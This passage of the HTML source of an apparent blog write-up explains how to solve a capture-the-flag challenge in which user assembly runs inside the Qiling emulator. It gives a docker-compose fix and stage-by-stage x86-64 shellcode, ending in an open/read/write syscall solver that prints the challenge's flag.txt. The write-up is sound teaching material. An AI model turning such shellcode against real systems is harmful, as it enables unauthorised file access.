operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rsi\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rdi<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rdi\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rbp<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rbp\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rip<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rip\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        rsp<span class=\"token operator\">=</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>ql<span class=\"token punctuation\">.</span>arch<span class=\"token punctuation\">.</span>regs<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token string\">\"rsp\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">)</span>\n\n\n<span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">\"__main__\"</span><span class=\"token punctuation\">:</span>\n    app<span class=\"token punctuation\">.</span>run<span class=\"token punctuation\">(</span>host<span class=\"token operator\">=</span><span class=\"token string\">\"0.0.0.0\"</span><span class=\"token punctuation\">,</span> port<span class=\"token operator\">=</span><span class=\"token number\">8080</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>As you can see from this code, the input assembly code (only mov, push, and syscall are allowed; maximum 25 lines) is assembled into binary using <code class=\"language-text\">asm(code, arch=\"amd64\", os=\"linux\")</code> and executed by Qiling.</p>\n<p>The application has four stages in total; reaching Stage 4 makes flag.txt readable.</p>\n<h3 id=\"setting-up-a-local-environment\" style=\"position:relative;\"><a href=\"#setting-up-a-local-environment\" aria-label=\"setting up a local environment permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Setting Up a Local Environment</h3>\n<p>First, I set up a local testing environment using the provided Dockerfile.</p>\n<p>In my environment, <code class=\"language-text\">docker-compose build</code> failed with a <code class=\"language-text\">TypeError: HTTPConnection.request() got an unexpected keyword argument 'chunked'</code> error, so I’m noting the workaround here.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">docker-compose</span> build\nTraceback <span class=\"token punctuation\">(</span>most recent call last<span class=\"token punctuation\">)</span>:\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">214</span>, <span class=\"token keyword\">in</span> _retrieve_server_version\n    <span class=\"token builtin class-name\">return</span> self.version<span class=\"token punctuation\">(</span>api_version<span class=\"token operator\">=</span>False<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"ApiVersion\"</span><span class=\"token punctuation\">]</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/daemon.py\"</span>, line <span class=\"token number\">181</span>, <span class=\"token keyword\">in</span> version\n    <span class=\"token builtin class-name\">return</span> self._result<span class=\"token punctuation\">(</span>self._get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">)</span>, <span class=\"token assign-left variable\">json</span><span class=\"token operator\">=</span>True<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/utils/decorators.py\"</span>, line <span class=\"token number\">46</span>, <span class=\"token keyword\">in</span> inner\n    <span class=\"token builtin class-name\">return</span> f<span class=\"token punctuation\">(</span>self, *args, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">237</span>, <span class=\"token keyword\">in</span> _get\n    <span class=\"token builtin class-name\">return</span> self.get<span class=\"token punctuation\">(</span>url, **self._set_request_timeout<span class=\"token punctuation\">(</span>kwargs<span class=\"token punctuation\">))</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">600</span>, <span class=\"token keyword\">in</span> get\n    <span class=\"token builtin class-name\">return</span> self.request<span class=\"token punctuation\">(</span><span class=\"token string\">\"GET\"</span>, url, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">587</span>, <span class=\"token keyword\">in</span> request\n    resp <span class=\"token operator\">=</span> self.send<span class=\"token punctuation\">(</span>prep, **send_kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\"</span>, line <span class=\"token number\">701</span>, <span class=\"token keyword\">in</span> send\n    r <span class=\"token operator\">=</span> adapter.send<span class=\"token punctuation\">(</span>request, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/requests/adapters.py\"</span>, line <span class=\"token number\">486</span>, <span class=\"token keyword\">in</span> send\n    resp <span class=\"token operator\">=</span> conn.urlopen<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\"</span>, line <span class=\"token number\">790</span>, <span class=\"token keyword\">in</span> urlopen\n    response <span class=\"token operator\">=</span> self._make_request<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\"</span>, line <span class=\"token number\">496</span>, <span class=\"token keyword\">in</span> _make_request\n    conn.request<span class=\"token punctuation\">(</span>\nTypeError: HTTPConnection.request<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> got an unexpected keyword argument <span class=\"token string\">'chunked'</span>\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback <span class=\"token punctuation\">(</span>most recent call last<span class=\"token punctuation\">)</span>:\n  File <span class=\"token string\">\"/usr/bin/docker-compose\"</span>, line <span class=\"token number\">33</span>, <span class=\"token keyword\">in</span> <span class=\"token operator\">&lt;</span>module<span class=\"token operator\">></span>\n    sys.exit<span class=\"token punctuation\">(</span>load_entry_point<span class=\"token punctuation\">(</span><span class=\"token string\">'docker-compose==1.29.2'</span>, <span class=\"token string\">'console_scripts'</span>, <span class=\"token string\">'docker-compose'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">))</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/main.py\"</span>, line <span class=\"token number\">81</span>, <span class=\"token keyword\">in</span> main\n    command_func<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/main.py\"</span>, line <span class=\"token number\">200</span>, <span class=\"token keyword\">in</span> perform_command\n    project <span class=\"token operator\">=</span> project_from_options<span class=\"token punctuation\">(</span><span class=\"token string\">'.'</span>, options<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/command.py\"</span>, line <span class=\"token number\">60</span>, <span class=\"token keyword\">in</span> project_from_options\n    <span class=\"token builtin class-name\">return</span> get_project<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/command.py\"</span>, line <span class=\"token number\">152</span>, <span class=\"token keyword\">in</span> get_project\n    client <span class=\"token operator\">=</span> get_client<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/docker_client.py\"</span>, line <span class=\"token number\">41</span>, <span class=\"token keyword\">in</span> get_client\n    client <span class=\"token operator\">=</span> docker_client<span class=\"token punctuation\">(</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/compose/cli/docker_client.py\"</span>, line <span class=\"token number\">170</span>, <span class=\"token keyword\">in</span> docker_client\n    client <span class=\"token operator\">=</span> APIClient<span class=\"token punctuation\">(</span>use_ssh_client<span class=\"token operator\">=</span>not use_paramiko_ssh, **kwargs<span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">197</span>, <span class=\"token keyword\">in</span> __init__\n    self._version <span class=\"token operator\">=</span> self._retrieve_server_version<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n  File <span class=\"token string\">\"/usr/lib/python3/dist-packages/docker/api/client.py\"</span>, line <span class=\"token number\">221</span>, <span class=\"token keyword\">in</span> _retrieve_server_version\n    raise DockerException<span class=\"token punctuation\">(</span>\ndocker.errors.DockerException: Error <span class=\"token keyword\">while</span> fetching server API version: HTTPConnection.request<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> got an unexpected keyword argument <span class=\"token string\">'chunked'</span></code></pre></div>\n<p>Since the above error appeared, I resolved it by downgrading the requests package to version 2.29.0 as shown below.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">pip <span class=\"token function\">install</span> <span class=\"token assign-left variable\">requests</span><span class=\"token operator\">==</span><span class=\"token number\">2.29</span>.0</code></pre></div>\n<p>As noted in the issue below, this error is caused by a compatibility problem with the requests package.</p>\n<p>Reference: <a href=\"https://github.com/docker/docker-py/issues/3113\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">urllib3 v2 incompatibility · Issue #3113 · docker/docker-py</a></p>\n<h3 id=\"stage-1-stage-2\" style=\"position:relative;\"><a href=\"#stage-1-stage-2\" aria-label=\"stage 1 stage 2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 1, Stage 2</h3>\n<p>First, I’ll clear Stage 1 and Stage 2.</p>\n<p>Stage 1 is cleared by setting RAX to 0x123, and Stage 2 by placing 0x123 on the top of the stack.</p>\n<p>By executing the following assembly code in sequence, I was able to advance to Stage 3.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">mov rax,0x123\npush rax</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/36d70c9a9cce9027cd901571c07d8345/afd0b/image-20240616105855558.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.33333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQUlEQVQ4y53SS08TURgG4APazlChl+mc6QyFXmdaepmWlsYCGqEpRkI16BQCGqEsvEQjUaMbNxJXKIlLt14TIwuX/gkTdcP/ef2mbSgVHRIXT853zsx5Z76cw4x0Dnoqi6SRRULPIJZII5acQJzqSNxoz8ORBCSuIaiMdti1rB7HVbDxqI64HUAS+gR0I4MkjdFoEjK9wBWtj0xhcigMRYuAq2N97HWWSKZhGPQXY9H2y5z+QKGNiqJ2x56QGkbAG0B+eQvW/k9Yn7+juf8LzS8/sPr1AI0338AiMR1jkTg4pbdb4d2W2q0d1VmTgxxSfgaBlUcIWg/gu3wbvsYteK/chW/hBphEvUvt/qkVe4MDO5DLIQwnCxDqmxBmm2C5ObD8PJhZA8ucA+vbcBiq/UUvcEQvQqxvwDPdxEBhAWzqElnEqUKtE+gc9GegghGjBPfFLQzXNuGeXQUrL4JVGhgo1sF4aLx3FfioM/ujdPL+SAoe8wJGivMYLsxBSFUgpM9iSC+BBYJeOm46UY2ugjp6Iq7ZVyRMt0Gl8FAbD2mHWM58Cu5Nwe8+A0n0IyD6HPnFAHzH+OETyJAEVt3eweTDFnL3lpG/3yTWfzG3V5BpNcCyd+ZRer6K0s46jWtkvWvtyNrJyi+uw3x8FcxjLUHYsCDevAZx418sh2cdQquJoZUlsMHdJ2DvX4J9eNW116s/dut3u87ekk97GHz9DEysmHCdr8A1XYKrSmbKVJc7c7uuTsJVzhPT0ekpE0Ihi9+guse7N3IpQAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/36d70c9a9cce9027cd901571c07d8345/8ac56/image-20240616105855558.webp 240w,\n/static/36d70c9a9cce9027cd901571c07d8345/d3be9/image-20240616105855558.webp 480w,\n/static/36d70c9a9cce9027cd901571c07d8345/e46b2/image-20240616105855558.webp 960w,\n/static/36d70c9a9cce9027cd901571c07d8345/99eb3/image-20240616105855558.webp 1153w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/36d70c9a9cce9027cd901571c07d8345/8ff5a/image-20240616105855558.png 240w,\n/static/36d70c9a9cce9027cd901571c07d8345/e85cb/image-20240616105855558.png 480w,\n/static/36d70c9a9cce9027cd901571c07d8345/d9199/image-20240616105855558.png 960w,\n/static/36d70c9a9cce9027cd901571c07d8345/afd0b/image-20240616105855558.png 1153w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/36d70c9a9cce9027cd901571c07d8345/d9199/image-20240616105855558.png\"\n            alt=\"image-20240616105855558\"\n            title=\"image-20240616105855558\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"stage-3\" style=\"position:relative;\"><a href=\"#stage-3\" aria-label=\"stage 3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 3</h3>\n<p>The clear condition for Stage 3 was to print the string <code class=\"language-text\">Hello</code> to standard output.</p>\n<p>This condition was cleared with the following assembly code.</p>\n<p>This code places the string <code class=\"language-text\">olleH</code> (0x6f6c6c6548) in little-endian form on the stack top, passes that address to RSI, and uses syscall number 1 (write) to output <code class=\"language-text\">Hello</code> to standard output.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">mov rax, <span class=\"token number\">1</span>\nmov rdi, <span class=\"token number\">1</span>\nmov rbx, 0x6f6c6c6548\npush rbx\nmov rsi, rsp\nmov rdx, <span class=\"token number\">5</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://manpages.debian.org/unstable/manpages-dev/write.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">write(2) — manpages-dev — Debian unstable — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://filippo.io/linux-syscall-table/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Searchable Linux Syscall Table for x86_64</a></p>\n<p>The solution itself is simple, but there were several pitfalls I encountered on the way to this assembly code.</p>\n<p>First, in my initial code I tried to push the immediate value 0x6f6c6c6548 onto the stack with <code class=\"language-text\">push 0x6f6c6c6548</code>, which produced the following error.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">[</span>ERROR<span class=\"token punctuation\">]</span> There was an error running <span class=\"token punctuation\">[</span><span class=\"token string\">'/usr/bin/x86_64-linux-gnu-as'</span>, <span class=\"token string\">'-64'</span>, <span class=\"token string\">'-o'</span>, <span class=\"token string\">'/tmp/pwn-asm-ong0t78p/step2'</span>, <span class=\"token string\">'/tmp/pwn-asm-ong0t78p/step1'</span><span class=\"token punctuation\">]</span>:\n    It had the exitcode <span class=\"token number\">1</span>.\n    It had this on stdout:\n    /tmp/pwn-asm-ong0t78p/step1: Assembler messages:\n    /tmp/pwn-asm-ong0t78p/step1:10: Error: operand <span class=\"token builtin class-name\">type</span> mismatch <span class=\"token keyword\">for</span> <span class=\"token variable\"><span class=\"token variable\">`</span>push<span class=\"token string\">'\n\n[ERROR] An error occurred while assembling:\n       1: .section .shellcode,\"awx\"\n       2: .global _start\n       3: .global __start\n       4: .p2align 2\n       5: _start:\n       6: __start:\n       7: .intel_syntax noprefix\n       8: mov rax, 1\n       9: mov rdi, 1\n      10: push 0x6f6c6c6548\n      11: mov rsi, rsp\n      12: mov rdx, 9\n      13: syscall\n    Traceback (most recent call last):\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/asm.py\", line 701, in asm\n        _run(assembler + ['</span>-o<span class=\"token string\">', step2, step1])\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/asm.py\", line 419, in _run\n        log.error(msg, *args)\n      File \"/usr/local/lib/python3.10/dist-packages/pwnlib/log.py\", line 439, in error\n        raise PwnlibException(message % args)\n    pwnlib.exception.PwnlibException: There was an error running ['</span>/usr/bin/x86_64-linux-gnu-as<span class=\"token string\">', '</span>-64<span class=\"token string\">', '</span>-o<span class=\"token string\">', '</span>/tmp/pwn-asm-ong0t78p/step2<span class=\"token string\">', '</span>/tmp/pwn-asm-ong0t78p/step1'<span class=\"token punctuation\">]</span>:\n    It had the exitcode <span class=\"token number\">1</span>.\n    It had this on stdout:\n    /tmp/pwn-asm-ong0t78p/step1: Assembler messages:\n    /tmp/pwn-asm-ong0t78p/step1:10: Error: operand <span class=\"token builtin class-name\">type</span> mismatch <span class=\"token keyword\">for</span> <span class=\"token variable\">`</span></span>push'</code></pre></div>\n<p>This error occurs because the push instruction does not support 64-bit immediate operands.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 505px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABWklEQVQozz2R23KCMBCGeea+Wa+d6XULpQUcq1M51KmcwlEQIYD83WzVzITZbJZvvySabrzBsS2YhgHTNPFhWTDeDdiU098M6PorLMuG9WnhZbXC13aLaZpwvV5xH8uyYLnFmpQSXdfxVHHf9xjHkdZnmhfIYeC8mue2RdM0DFDAcZQMV2OeZ441tbHbbeG6HmaKD4cANhn5tD4TsK4rrNcO9t8usixHEsdwHFq7e1RVCd/3sdls4FF9VdXQlI0Qgjv2/QDfi+F6AX6PRyRpgrZtEEURGY5sVpYF5VNurv4RFBdFyXtsqICnU83aXZfhJ3gmmI/wGCLPc76KmKymab4BS4gs41gdU6SCzdS4ASUlCioA2QR0/CcC7KlrTQYzWrqzMIy4WEGKImfDOzBNEm7yAM70ESKFJNO+l2Q1UCG92vJ/pAsZ5nnxeNmmOaGsKo4VsCLY/aFUzR8qIxJBpXPoQwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/8ac56/image-20240616112338492.webp 240w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/d3be9/image-20240616112338492.webp 480w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/c5db7/image-20240616112338492.webp 505w\"\n              sizes=\"(max-width: 505px) 100vw, 505px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/8ff5a/image-20240616112338492.png 240w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/e85cb/image-20240616112338492.png 480w,\n/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png 505w\"\n            sizes=\"(max-width: 505px) 100vw, 505px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78bd6dc3dbff13fe3c95fa69176143b6/c0cb9/image-20240616112338492.png\"\n            alt=\"image-20240616112338492\"\n            title=\"image-20240616112338492\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.felixcloutier.com/x86/push\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">PUSH — Push Word, Doubleword, or Quadword Onto the Stack</a></p>\n<p>Reference: <a href=\"https://github.com/Gallopsled/pwntools/issues/1228\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Does pwntools cannot asm() format like ” push 64bit-number” · Issue #1228 · Gallopsled/pwntools</a></p>\n<p>As a result, using <code class=\"language-text\">push 0x6c6c6548</code> in the same assembly code to output the string <code class=\"language-text\">Hell</code> was possible.</p>\n<p>To work around this limitation, I first load the value into a general-purpose register and then push that register, storing the 64-bit value on the stack top.</p>\n<p>Incidentally, the reason for not doing it the following way is that a 64-bit slot would be allocated on the stack regardless, making the actually outputted string <code class=\"language-text\">Hell\\x00\\x00o</code> instead of <code class=\"language-text\">Hello</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">push 0x0000006f\npush 0x6c6c6548</code></pre></div>\n<h3 id=\"stage-4\" style=\"position:relative;\"><a href=\"#stage-4\" aria-label=\"stage 4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stage 4</h3>\n<p>Now that I’ve reached Stage 4, it’s finally time to retrieve the flag.</p>\n<p>As can be seen from the challenge code, upon reaching Stage 4, flag.txt is created inside a directory named with a random UUID.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">dirname <span class=\"token operator\">=</span> <span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span>uuid<span class=\"token punctuation\">.</span>uuid4<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nos<span class=\"token punctuation\">.</span>mkdir<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">if</span> session<span class=\"token punctuation\">[</span><span class=\"token string\">\"id\"</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"4\"</span><span class=\"token punctuation\">:</span>\n    f <span class=\"token operator\">=</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>os<span class=\"token punctuation\">.</span>path<span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>dirname<span class=\"token punctuation\">,</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span>\n    flag <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>environ<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{fake_flag}\"</span><span class=\"token punctuation\">)</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\n    f<span class=\"token punctuation\">.</span>close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nql <span class=\"token operator\">=</span> Qiling<span class=\"token punctuation\">(</span>\n    code<span class=\"token operator\">=</span>asm_code<span class=\"token punctuation\">,</span>\n    rootfs<span class=\"token operator\">=</span>dirname<span class=\"token punctuation\">,</span>\n    archtype<span class=\"token operator\">=</span>QL_ARCH<span class=\"token punctuation\">.</span>X8664<span class=\"token punctuation\">,</span>\n    ostype<span class=\"token operator\">=</span>QL_OS<span class=\"token punctuation\">.</span>LINUX<span class=\"token punctuation\">,</span>\n    verbose<span class=\"token operator\">=</span>QL_VERBOSE<span class=\"token punctuation\">.</span>DEFAULT<span class=\"token punctuation\">,</span>\n    log_file<span class=\"token operator\">=</span>logpath<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span></code></pre></div>\n<p>As indicated by the <code class=\"language-text\">rootfs=dirname</code> argument to Qiling, this directory serves as the root filesystem during execution.</p>\n<p>Reference: <a href=\"https://docs.qiling.io/en/latest/qltool/#run-options\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">qltool - Qiling Framework Documentation</a></p>\n<p>Therefore, we can obtain the flag simply by opening flag.txt, reading its contents, and printing them.</p>\n<p>The solver is as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">mov rax, 0x7478742e67616c66\npush 0x0\npush rax\nmov rax, <span class=\"token number\">2</span>\nmov rdi, rsp\nmov rsi, <span class=\"token number\">0</span>\nmov rdx, <span class=\"token number\">0</span>\nsyscall\n\nmov rdi, rax\nmov rax, <span class=\"token number\">0</span>\nmov rsi, rsp\nmov rdx, <span class=\"token number\">53</span>\nsyscall\n\nmov rax, <span class=\"token number\">1</span>\nmov rdi, <span class=\"token number\">1</span>\nmov rsi, rsp\nmov rdx, <span class=\"token number\">53</span>\nsyscall</code></pre></div>\n<p>The system calls used, in order from top to bottom, are open, read, and write.</p>\n<p>This allowed me to identify the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b22abdcaae0658056c62601c0f3aa594/fe238/image-20240615155952218.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 68.33333333333333%; position: relative; bottom: 0; left: 0; background-image: 